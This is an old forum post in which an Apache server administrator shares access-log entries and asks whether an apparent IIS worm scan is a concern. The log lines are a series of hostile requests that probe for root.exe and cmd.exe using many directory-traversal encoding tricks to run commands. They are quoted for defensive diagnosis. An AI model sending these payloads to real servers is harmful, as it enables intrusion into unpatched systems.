I just noticed this on my Apache server log. Is this anything I should be concerned about ? If I understand correctly what I've read is this is a worm that exploits MS IIS vulnerabilities. 209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 209.74.14.140 - - [21/Jan/2002:09:39:02 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 -- Guy Chouinard Jr http://linuxbytes.net.dhis.org/index.php3